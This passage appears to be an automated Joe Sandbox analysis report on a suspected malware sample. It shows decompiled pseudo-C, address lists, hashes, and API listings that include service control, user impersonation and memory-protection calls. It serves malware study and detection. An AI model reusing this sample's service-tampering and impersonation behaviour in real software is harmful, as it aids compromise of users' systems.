                                                                      											 *((intOrPtr*)(_t135 + 0x64)) =  *((intOrPtr*)(_t135 + 0x64)) +  *(_t135 + 4);
                                                                      											 *((intOrPtr*)(_t135 + 0x68)) =  *((intOrPtr*)(_t135 + 0x68)) +  *(_t135 + 0x10);
                                                                      											_push(0);
                                                                      											_push(_t135);
                                                                      											_t92 = E004073A0();
                                                                      											 *((intOrPtr*)(_t135 + 0x64)) =  *((intOrPtr*)(_t135 + 0x64)) -  *(_t135 + 4);
                                                                      											 *((intOrPtr*)(_t135 + 0x68)) =  *((intOrPtr*)(_t135 + 0x68)) -  *(_t135 + 0x10);
                                                                      											_t144 = _t144 + 8;
                                                                      											 *(_t135 + 0x38) = _t92;
                                                                      											__eflags = _t92 - 1;
                                                                      											if(_t92 != 1) {
                                                                      												L22:
                                                                      												__eflags =  *(_t135 + 0x38);
                                                                      												if( *(_t135 + 0x38) != 0) {
                                                                      													goto L37;
                                                                      												} else {
                                                                      													__eflags =  *(_t135 + 0x3c);
                                                                      													if( *(_t135 + 0x3c) != 0) {
                                                                      														goto L37;
                                                                      													} else {
                                                                      														__eflags =  *(_t135 + 0x10);
                                                                      														if( *(_t135 + 0x10) != 0) {
                                                                      															continue;
                                                                      														} else {
                                                                      															goto L37;
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											} else {
                                                                      												_t98 = E00403080( *(_t135 + 0x4c), _t133,  *((intOrPtr*)(_t135 + 0xc)) - _t133);
                                                                      												_t133 =  *((intOrPtr*)(_t135 + 0xc));
                                                                      												 *(_t135 + 0x4c) = _t98;
                                                                      												_t144 = _t144 + 0xc;
                                                                      												__eflags = E004055E0(_t135, __eflags) -  *(_t135 + 0x4c);
                                                                      												if(__eflags != 0) {
                                                                      													 *(_t135 + 0x38) = 0xfffffffd;
                                                                      													goto L37;
                                                                      												} else {
                                                                      													E004055E0(_t135, __eflags);
                                                                      													E00405000(_t135, _t110);
                                                                      													__eflags =  *(_t135 + 0x38);
                                                                      													if( *(_t135 + 0x38) != 0) {
                                                                      														goto L37;
                                                                      													} else {
                                                                      														E004070F0(_t135); // executed
                                                                      														_t106 = E00403080(0, 0, "true");
                                                                      														_t144 = _t144 + 0x10;
                                                                      														 *(_t135 + 0x4c) = _t106;
                                                                      														goto L22;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										} else {
                                                                      											__eflags =  *(_t135 + 0x3c);
                                                                      											if(__eflags != 0) {
                                                                      												goto L18;
                                                                      											} else {
                                                                      												 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                                                                      												_t95 = E0040BF62( *((intOrPtr*)(_t135 + 0x44)), 1, 0x4000,  *((intOrPtr*)(_t135 + 0x40)));
                                                                      												_t144 = _t144 + 0x10;
                                                                      												 *(_t135 + 4) = _t95;
                                                                      												__eflags = _t95;
                                                                      												if(_t95 != 0) {
                                                                      													L17:
                                                                      													 *_t135 =  *((intOrPtr*)(_t135 + 0x44));
                                                                      													goto L18;
                                                                      												} else {
                                                                      													 *(_t135 + 0x3c) = 1;
                                                                      													_t96 = E0040BC8E( *((intOrPtr*)(_t135 + 0x40)));
                                                                      													_t144 = _t144 + 4;
                                                                      													__eflags = _t96;
                                                                      													if(_t96 != 0) {
                                                                      														 *(_t135 + 0x38) = 0xffffffff;
                                                                      														goto L37;
                                                                      													} else {
                                                                      														goto L17;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      										goto L44;
                                                                      									}
                                                                      									_t134 =  *(_t135 + 4);
                                                                      									_t86 =  *(_t135 + 0x10);
                                                                      									__eflags = _t134 - _t86;
                                                                      									if(_t134 > _t86) {
                                                                      										_t134 = _t86;
                                                                      									}
                                                                      									__eflags = _t134;
                                                                      									if(_t134 > 0) {
                                                                      										E0040B350(_t110, _t134, _t135,  *((intOrPtr*)(_t135 + 0xc)),  *_t135, _t134);
                                                                      										 *_t135 =  *_t135 + _t134;
                                                                      										 *(_t135 + 0x10) =  *(_t135 + 0x10) - _t134;
                                                                      										_t110 = _t110 + _t134;
                                                                      										_t144 = _t144 + 0xc;
                                                                      										_t59 = _t135 + 4;
                                                                      										 *_t59 =  *(_t135 + 4) - _t134;
                                                                      										__eflags =  *_t59;
                                                                      										 *((intOrPtr*)(_t135 + 0xc)) = _t110;
                                                                      									}
                                                                      									_t87 =  *(_t135 + 0x10);
                                                                      									__eflags = _t87;
                                                                      									if(_t87 > 0) {
                                                                      										_t89 = E0040BF62(_t110, 1, _t87,  *((intOrPtr*)(_t135 + 0x40)));
                                                                      										_t64 = _t135 + 0x10;
                                                                      										 *_t64 =  *(_t135 + 0x10) - _t89;
                                                                      										__eflags =  *_t64;
                                                                      									}
                                                                      									_t141 = _t138 -  *(_t135 + 0x10);
                                                                      									 *((intOrPtr*)(_t135 + 0x64)) =  *((intOrPtr*)(_t135 + 0x64)) + _t141;
                                                                      									 *((intOrPtr*)(_t135 + 0x68)) =  *((intOrPtr*)(_t135 + 0x68)) + _t141;
                                                                      									__eflags = _t141;
                                                                      									if(_t141 == 0) {
                                                                      										 *(_t135 + 0x3c) = 1;
                                                                      									}
                                                                      									return _t141;
                                                                      								}
                                                                      							} else {
                                                                      								__eflags =  *(_t135 + 0x6c) - _t124;
                                                                      								if( *(_t135 + 0x6c) == _t124) {
                                                                      									goto L10;
                                                                      								} else {
                                                                      									 *_t78 =  *(_t135 + 0x6c);
                                                                      									 *(_t135 + 0x10) =  *(_t135 + 0x10) + _t124;
                                                                      									_t110 = _t78 + 1;
                                                                      									 *((intOrPtr*)(_t135 + 0xc)) =  *((intOrPtr*)(_t135 + 0xc)) + 1;
                                                                      									 *((intOrPtr*)(_t135 + 0x68)) =  *((intOrPtr*)(_t135 + 0x68)) + 1;
                                                                      									__eflags =  *(_t135 + 0x70);
                                                                      									 *(_t135 + 0x6c) = _t124;
                                                                      									_t133 = _t110;
                                                                      									if( *(_t135 + 0x70) == 0) {
                                                                      										goto L10;
                                                                      									} else {
                                                                      										 *(_t135 + 0x38) = 1;
                                                                      										return 1;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							return 0;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				L44:
                                                                      			}





























                                                                      0x00405a20
                                                                      0x00405a25
                                                                      0x00405a2a
                                                                      0x00405a2e
                                                                      0x00405c63
                                                                      0x00405a3e
                                                                      0x00405a3e
                                                                      0x00405a41
                                                                      0x00405a47
                                                                      0x00405c5b
                                                                      0x00405a55
                                                                      0x00405a58
                                                                      0x00405a61
                                                                      0x00405a65
                                                                      0x00405a67
                                                                      0x00405a6a
                                                                      0x00405a6d
                                                                      0x00405a6f
                                                                      0x00405a9f
                                                                      0x00405a9f
                                                                      0x00405aa3
                                                                      0x00405c1c
                                                                      0x00405c27
                                                                      0x00405c2c
                                                                      0x00405c32
                                                                      0x00405c35
                                                                      0x00405c37
                                                                      0x00405c4e
                                                                      0x00405c53
                                                                      0x00405c53
                                                                      0x00405c56
                                                                      0x00405c39
                                                                      0x00405c39
                                                                      0x00405c3c
                                                                      0x00405c3f
                                                                      0x00405c46
                                                                      0x00405c49
                                                                      0x00405c49
                                                                      0x00405c4d
                                                                      0x00405c41
                                                                      0x00405c41
                                                                      0x00405c44
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405c44
                                                                      0x00405c3f
                                                                      0x00405ab0
                                                                      0x00405ab0
                                                                      0x00405ab0
                                                                      0x00405ab4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405aba
                                                                      0x00405abe
                                                                      0x00405b0f
                                                                      0x00405b15
                                                                      0x00405b18
                                                                      0x00405b1b
                                                                      0x00405b1d
                                                                      0x00405b1e
                                                                      0x00405b29
                                                                      0x00405b2c
                                                                      0x00405b2f
                                                                      0x00405b32
                                                                      0x00405b35
                                                                      0x00405b38
                                                                      0x00405b8e
                                                                      0x00405b8e
                                                                      0x00405b92
                                                                      0x00000000
                                                                      0x00405b98
                                                                      0x00405b98
                                                                      0x00405b9c
                                                                      0x00000000
                                                                      0x00405b9e
                                                                      0x00405b9e
                                                                      0x00405ba2
                                                                      0x00000000
                                                                      0x00405ba8
                                                                      0x00000000
                                                                      0x00405ba8
                                                                      0x00405ba2
                                                                      0x00405b9c
                                                                      0x00405b3a
                                                                      0x00405b45
                                                                      0x00405b4a
                                                                      0x00405b4d
                                                                      0x00405b50
                                                                      0x00405b5a
                                                                      0x00405b5d
                                                                      0x00405baa
                                                                      0x00000000
                                                                      0x00405b5f
                                                                      0x00405b61
                                                                      0x00405b68
                                                                      0x00405b6d
                                                                      0x00405b71
                                                                      0x00000000
                                                                      0x00405b77
                                                                      0x00405b78
                                                                      0x00405b83
                                                                      0x00405b88
                                                                      0x00405b8b
                                                                      0x00000000
                                                                      0x00405b8b
                                                                      0x00405b71
                                                                      0x00405b5d
                                                                      0x00405ac0
                                                                      0x00405ac0
                                                                      0x00405ac4
                                                                      0x00000000
                                                                      0x00405ac6
                                                                      0x00405acb
                                                                      0x00405ae0
                                                                      0x00405ae5
                                                                      0x00405ae8
                                                                      0x00405aeb
                                                                      0x00405aed
                                                                      0x00405b0a
                                                                      0x00405b0d
                                                                      0x00000000
                                                                      0x00405aef
                                                                      0x00405af3
                                                                      0x00405afa
                                                                      0x00405aff
                                                                      0x00405b02
                                                                      0x00405b04
                                                                      0x00405c15
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405b04
                                                                      0x00405aed
                                                                      0x00405ac4
                                                                      0x00000000
                                                                      0x00405abe
                                                                      0x00405bb3
                                                                      0x00405bb6
                                                                      0x00405bb9
                                                                      0x00405bbb
                                                                      0x00405bbd
                                                                      0x00405bbd
                                                                      0x00405bbf
                                                                      0x00405bc1
                                                                      0x00405bcb
                                                                      0x00405bd0
                                                                      0x00405bd2
                                                                      0x00405bd5
                                                                      0x00405bd7
                                                                      0x00405bda
                                                                      0x00405bda
                                                                      0x00405bda
                                                                      0x00405bdd
                                                                      0x00405bdd
                                                                      0x00405be0
                                                                      0x00405be3
                                                                      0x00405be5
                                                                      0x00405bef
                                                                      0x00405bf7
                                                                      0x00405bf7
                                                                      0x00405bf7
                                                                      0x00405bf7
                                                                      0x00405bfa
                                                                      0x00405bfd
                                                                      0x00405c00
                                                                      0x00405c03
                                                                      0x00405c05
                                                                      0x00405c07
                                                                      0x00405c07
                                                                      0x00405c14
                                                                      0x00405c14
                                                                      0x00405a71
                                                                      0x00405a71
                                                                      0x00405a74
                                                                      0x00000000
                                                                      0x00405a76
                                                                      0x00405a79
                                                                      0x00405a7b
                                                                      0x00405a7e
                                                                      0x00405a86
                                                                      0x00405a89
                                                                      0x00405a8c
                                                                      0x00405a90
                                                                      0x00405a93
                                                                      0x00405a95
                                                                      0x00000000
                                                                      0x00405a97
                                                                      0x00405a9a
                                                                      0x00405a9e
                                                                      0x00405a9e
                                                                      0x00405a95
                                                                      0x00405a74
                                                                      0x00405a5b
                                                                      0x00405a5e
                                                                      0x00405a5e
                                                                      0x00405a58
                                                                      0x00405a47
                                                                      0x00000000

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b084eca792c7b7879e2cade4dd6ea029dcc7911505801cb43ceb0c5d904e76dd
                                                                      • Instruction ID: 168e27a369536ec56344fe0227db1249f7596168985b86e43d145dbb19a92fe0
                                                                      • Opcode Fuzzy Hash: b084eca792c7b7879e2cade4dd6ea029dcc7911505801cb43ceb0c5d904e76dd
                                                                      • Instruction Fuzzy Hash: E4713C71604B008FE7309E29D844667B7E4EF80324F148A2EE5A697BD0D779F8858F89
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 347 5b0e0f-5b0e24 SetErrorMode * 2 348 5b0e2b-5b0e2c 347->348 349 5b0e26 347->349 349->348
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00000400,?,?,005B0223,?,?), ref: 005B0E19
                                                                      • SetErrorMode.KERNELBASE(00000000,?,?,005B0223,?,?), ref: 005B0E1E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                      • Instruction ID: e6f0b986f79c47f2df78b5900a9022620743f9650b9358d5e1040a707868e860
                                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                      • Instruction Fuzzy Hash: 0FD0123114512877D7002A94DC09BCE7F1CDF05B62F008411FB0DD9080C770994046E5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 350 40e7ee-40e7f6 call 40e7c3 352 40e7fb-40e7ff ExitProcess 350->352
                                                                      C-Code - Quality: 100%
                                                                      			E0040E7EE(int _a4) {
                                                                      
                                                                      				E0040E7C3(_a4); // executed
                                                                      				ExitProcess(_a4);
                                                                      			}



                                                                      0x0040e7f6
                                                                      0x0040e7ff

                                                                      APIs
                                                                      • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                        • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                        • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                        • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                      • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                      • String ID:
                                                                      • API String ID: 2427264223-0
                                                                      • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                      • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                      • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                      • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 461 23999e8-2399a49 463 2399a4b-2399a55 461->463 464 2399a82-2399ad2 OpenServiceA 461->464 463->464 465 2399a57-2399a59 463->465 469 2399adb-2399b0c 464->469 470 2399ad4-2399ada 464->470 467 2399a5b-2399a65 465->467 468 2399a7c-2399a7f 465->468 471 2399a69-2399a78 467->471 472 2399a67 467->472 468->464 476 2399b1c 469->476 477 2399b0e-2399b12 469->477 470->469 471->471 474 2399a7a 471->474 472->471 474->468 477->476 478 2399b14 477->478 478->476
                                                                      APIs
                                                                      • OpenServiceA.ADVAPI32(?,?,?), ref: 02399AC2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.367394519.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2390000_amMl.jbxd
                                                                      Similarity
                                                                      • API ID: OpenService
                                                                      • String ID:
                                                                      • API String ID: 3098006287-0
                                                                      • Opcode ID: c2ee00277bf20a024c1abf4106b8fc45c3333e118144e8e895a40942a0ee4f8b
                                                                      • Instruction ID: d017e582c3cbd8ca2db2c8961093438d74bf88c9895a7fbdccf666ef6f3c2737
                                                                      • Opcode Fuzzy Hash: c2ee00277bf20a024c1abf4106b8fc45c3333e118144e8e895a40942a0ee4f8b
                                                                      • Instruction Fuzzy Hash: 643166B0D002488FDF10CFAAC884B9EBBF1FF49704F14812AE815AB240D7789842CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 479 2399920-239996f 481 2399971-2399974 479->481 482 2399977-239997b 479->482 481->482 483 239997d-2399980 482->483 484 2399983-23999b2 OpenSCManagerW 482->484 483->484 485 23999bb-23999cf 484->485 486 23999b4-23999ba 484->486 486->485
                                                                      APIs
                                                                      • OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 023999A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.367394519.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2390000_amMl.jbxd
                                                                      Similarity
                                                                      • API ID: ManagerOpen
                                                                      • String ID:
                                                                      • API String ID: 1889721586-0
                                                                      • Opcode ID: 7d33c4903f89c8be39fcf30ab1dcc82d7e8b36e8bb4590039356aee5e8a66223
                                                                      • Instruction ID: 5a186ace8dca9033b271dbd35792ca74a362cece27c155fd906772e46ed30ee9
                                                                      • Opcode Fuzzy Hash: 7d33c4903f89c8be39fcf30ab1dcc82d7e8b36e8bb4590039356aee5e8a66223
                                                                      • Instruction Fuzzy Hash: 592135B5C002098FCF10CF9AD884BDEFBF5EF89314F14815AD808AB244D7749941CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 488 2399180-2399201 VirtualProtect 491 239920a-239922f 488->491 492 2399203-2399209 488->492 492->491
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 023991F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.367394519.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2390000_amMl.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 27880ccc157b0d7cac1edf298c6e00d12b1a447d3d8feb9705ee292fcce63a6a
                                                                      • Instruction ID: 46a533f11d9973467803fc403bf71a572571a1ccc0e450aebf4d61e40929727c
                                                                      • Opcode Fuzzy Hash: 27880ccc157b0d7cac1edf298c6e00d12b1a447d3d8feb9705ee292fcce63a6a
                                                                      • Instruction Fuzzy Hash: 3E1113B5D002098BDB10CFAAC884A9FFBF5EF48314F14842ED429A7240C7799945CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 496 239a0e8-239a165 ControlService 498 239a16e-239a18f 496->498 499 239a167-239a16d 496->499 499->498
                                                                      APIs
                                                                      • ControlService.ADVAPI32(?,?,?), ref: 0239A158
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.367394519.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2390000_amMl.jbxd
                                                                      Similarity
                                                                      • API ID: ControlService
                                                                      • String ID:
                                                                      • API String ID: 253159669-0
                                                                      • Opcode ID: 6d156729e6d13c13f6411ff3ba453624fe62ad1a18f6a54aa26ba593b42e54f5
                                                                      • Instruction ID: b27f0750fd15baa5295d999e8b6afebaf900516c125c642c00e534328c914f80
                                                                      • Opcode Fuzzy Hash: 6d156729e6d13c13f6411ff3ba453624fe62ad1a18f6a54aa26ba593b42e54f5
                                                                      • Instruction Fuzzy Hash: A511E4B59002499FDB10CF9AC984BDEFBF4EB48314F10852AE458A7240D378A945CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 501 2399ed8-2399f44 ImpersonateLoggedOnUser 503 2399f4d-2399f6e 501->503 504 2399f46-2399f4c 501->504 504->503
                                                                      APIs
                                                                      • ImpersonateLoggedOnUser.KERNELBASE ref: 02399F37
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.367394519.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2390000_amMl.jbxd
                                                                      Similarity
                                                                      • API ID: ImpersonateLoggedUser
                                                                      • String ID:
                                                                      • API String ID: 2216092060-0
                                                                      • Opcode ID: da76f77a8dbe83d12486945799290eaff42a2ae45c3e5a4f4b6b6a4244395e04
                                                                      • Instruction ID: 2319aff203201e9af4f909d767c4868e3b9c55fe2dda4d4df299b329a917b7de
                                                                      • Opcode Fuzzy Hash: da76f77a8dbe83d12486945799290eaff42a2ae45c3e5a4f4b6b6a4244395e04
                                                                      • Instruction Fuzzy Hash: 171148B5900249CFDB10CF9AC984BDEFBF4EF48324F20845AD419A3240D378A945CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0040D534(intOrPtr _a4) {
                                                                      				void* _t6;
                                                                      
                                                                      				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                      				 *0x4234b4 = _t6;
                                                                      				if(_t6 != 0) {
                                                                      					 *0x4250b0 = 1;
                                                                      					return 1;
                                                                      				} else {
                                                                      					return _t6;
                                                                      				}
                                                                      			}




                                                                      0x0040d549
                                                                      0x0040d54f
                                                                      0x0040d556
                                                                      0x0040d55d
                                                                      0x0040d563
                                                                      0x0040d559
                                                                      0x0040d559
                                                                      0x0040d559

                                                                      APIs
                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateHeap
                                                                      • String ID:
                                                                      • API String ID: 10892065-0
                                                                      • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                      • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                      • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                      • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 25%
                                                                      			E0040EA0A(intOrPtr _a4) {
                                                                      				void* __ebp;
                                                                      				void* _t2;
                                                                      				void* _t3;
                                                                      				void* _t4;
                                                                      				void* _t5;
                                                                      				void* _t8;
                                                                      
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(_a4);
                                                                      				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
                                                                      				return _t2;
                                                                      			}









                                                                      0x0040ea0f
                                                                      0x0040ea11
                                                                      0x0040ea13
                                                                      0x0040ea16
                                                                      0x0040ea1f

                                                                      APIs
                                                                      • _doexit.LIBCMT ref: 0040EA16
                                                                        • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                        • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                        • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                      • String ID:
                                                                      • API String ID: 1597249276-0
                                                                      • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                      • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                      • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                      • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 005B0929
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProcessTerminate
                                                                      • String ID:
                                                                      • API String ID: 560597551-0
                                                                      • Opcode ID: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                                                                      • Instruction ID: f1a77b98683cafb1fb7459b4dcf7902f75ab8b99c0f73db378513641b05b932d
                                                                      • Opcode Fuzzy Hash: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                                                                      • Instruction Fuzzy Hash: 1190026038415011D820259C4C02B0510021751634F3047107170B91D4D84496144126
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.367179672.000000000088D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0088D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_88d000_amMl.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6925b4d9788b6c10667373c33c0d1df5eb8838be6dc6342e433520d1c0a2f396
                                                                      • Instruction ID: adc6d067eb7b70a20ec05e9e0981ab5e10c09ff332f0544898331cd3ff33b20d
                                                                      • Opcode Fuzzy Hash: 6925b4d9788b6c10667373c33c0d1df5eb8838be6dc6342e433520d1c0a2f396
                                                                      • Instruction Fuzzy Hash: 6501D4715047489AE7209A2ADC80B67BFC8FF51328F18C51AEC459A2C2C2799845C7B2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.367179672.000000000088D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0088D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_88d000_amMl.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 814c8d4ad28e822b71d6114ecd511e82e53c53926d020d7d7fb3df4e666f309e
                                                                      • Instruction ID: f3593e32338fa3782a143f026d162196e19e8ad19f1ed11f2a844c4a0cf62d72
                                                                      • Opcode Fuzzy Hash: 814c8d4ad28e822b71d6114ecd511e82e53c53926d020d7d7fb3df4e666f309e
